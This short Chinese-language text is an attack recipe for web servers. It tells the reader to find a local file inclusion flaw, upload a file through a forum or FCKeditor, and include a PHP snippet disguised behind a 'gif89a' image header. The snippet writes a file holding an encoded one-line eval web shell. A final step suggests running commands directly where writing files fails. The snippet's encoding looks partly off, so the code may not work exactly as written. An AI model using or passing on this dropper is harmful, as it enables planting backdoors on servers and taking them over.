1.找到LFI本地包含的漏洞

2.想办法上传不管是通过bbs，FCKEDITOR或者其他任何方式

3.使用如下代码

gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>

 

4.如果没有写入权限可以直接写脚本进行执行命令操作等